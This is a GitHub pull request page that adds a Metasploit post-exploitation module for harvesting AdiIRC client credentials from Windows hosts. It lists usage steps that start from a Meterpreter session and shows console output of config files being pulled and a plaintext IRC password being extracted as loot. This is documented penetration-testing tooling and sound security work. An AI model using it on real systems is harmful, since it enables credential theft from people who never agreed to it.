Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Adi IRC PackRat module #19169

Merged
7 commits merged into from May 17, 2024
Merged

Add Adi IRC PackRat module #19169

7 commits merged into from May 17, 2024

Conversation

The-Pink-Panther
Copy link
Contributor

As A part of my final year project at Leeds Beckett University, I have developed several post-exploitation modules utilising the existing PackRat framework built by former LBU students. This PR will add a new /post/windows/gather/credentials module for the Adi IRC Client. https://www.adiirc.com/

This pull request will add two files:

  1. modules/post/windows/gather/credentials/adi_irc.rb
  2. documentation/modules/post/windows/gather/credentials/adi_irc.md

Verification

  1. Start msfconsole
  2. Get a Meterpreter session on a Windows system
  3. use post/windows/gather/credentials/adi_irc
  4. Set SESSION 1
  5. run

Scenario

Using AdiIRC Client v4.4 running on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045

msf6 post(windows/gather/credentials/adi_irc) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Adi irc's Config file found
[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.bak
[*] Adi irc Config.bak downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508083920_default_10.0.0.2_AdiIRCconfig.ba_051695.bak

[+] serverhost=chat.freenode.net
[+] Serverhost=irc.test.net
[+] serverport=6667
[+] Serverport=6667
[+] Usernick=TheTester
[+] QuickPassword=tiaspbiqe2r
[+] File with data saved:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_EXTRACTIONconfig_949744.bak
[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.ini
[*] Adi irc Config.ini downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_AdiIRCconfig.in_618977.ini

[+] serverhost=chat.freenode.net
[+] Serverhost=irc.test.net
[+] serverport=6667
[+] Serverport=6667
[+] Usernick=TheTester
[+] QuickPassword=tiaspbiqe2r
[+] File with data saved:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_EXTRACTIONconfig_981500.ini
[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
[*] Adi irc Networks.ini downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_AdiIRCnetworks._976889.ini

[+] File with data saved:  /home/kali/.msf4/loot/20240508083922_default_10.0.0.2_EXTRACTIONconfig_407804.ini
[*] Adi irc's Networks file found
[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
[*] Adi irc Networks.ini downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508083922_default_10.0.0.2_AdiIRCnetworks._497206.ini

[*] undefined method `each' for nil:NilClass
[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.bak
[*] Adi irc Networks.bak downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508083922_default_10.0.0.2_AdiIRCnetworks._102963.bak

[*] undefined method `each' for nil:NilClass
[*] PackRat credential sweep Completed
[*] Post module execution completed

@The-Pink-Panther The-Pink-Panther changed the title Adi irc packrat module Add Adi IRC PackRat module May 8, 2024
cgranleese-r7
cgranleese-r7 reviewed May 9, 2024
View reviewed changes
Copy link
Contributor

@cgranleese-r7 cgranleese-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The other PRs have suggestions that are relevant here as well.

documentation/modules/post/windows/gather/credentials/adi_irc.md Outdated Show resolved Hide resolved
@bwatters-r7 bwatters-r7 self-assigned this May 15, 2024
@bwatters-r7
Copy link
Contributor 

msf6 post(windows/gather/credentials/adi_irc) > show options

Module options (post/windows/gather/credentials/adi_irc):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   ARTIFACTS     All              no        Type of artifacts to collect (Accepted: All, quick_connect, Networks)
   EXTRACT_DATA  true             no        Extract data and stores in a separate file
   SESSION       1                yes       The session to run this module on
   STORE_LOOT    true             no        Store artifacts into loot database


View the full module info with the info, or info -d command.

msf6 post(windows/gather/credentials/adi_irc) > set verbose true
verbose => true
msf6 post(windows/gather/credentials/adi_irc) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Starting Packrat...
[*] Adi irc's base folder found
[*] Found the folder containing specified artifact for config.
[-] Adi irc's Config not found in msfuser's user directory

[-] Skipping config since it was not found on the user's folder.
[*] Adi irc's base folder found
[*] Found the folder containing specified artifact for networks.
[-] Adi irc's Networks not found in msfuser's user directory

[-] Skipping networks since it was not found on the user's folder.
[*] PackRat credential sweep Completed
[*] Post module execution completed

-Pink-Panther and others added 7 commits May 17, 2024 09:58
@bwatters-r7
Added post module for Adi IRC Client
39630f1
@bwatters-r7
Added module documentation
3da09a0
@The-Pink-Panther @cgranleese-r7 @bwatters-r7
Fixed rouge space
7088b39 
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
@The-Pink-Panther @cgranleese-r7 @bwatters-r7
Fixed documentation formatting
704de79 
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
@The-Pink-Panther @cgranleese-r7 @bwatters-r7
Re-structured artifact enumeration option
a8f1d35 
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
@The-Pink-Panther @cgranleese-r7 @bwatters-r7
Removed unused regex search
175e16a 
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
@The-Pink-Panther @bwatters-r7
Added Adi IRC and Windows version to documentation scenarios
9294d3b
@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label May 17, 2024
@bwatters-r7 bwatters-r7 closed this pull request by merging all changes into rapid7:master in 20e0834 May 17, 2024
@bwatters-r7
Copy link
Contributor

Release Notes

This adds a gather module leveraging Packrat targeting Adi IRC client.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@cgranleese-r7 cgranleese-r7 cgranleese-r7 left review comments

Assignees

@bwatters-r7 bwatters-r7

Labels
rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@The-Pink-Panther @bwatters-r7 @cgranleese-r7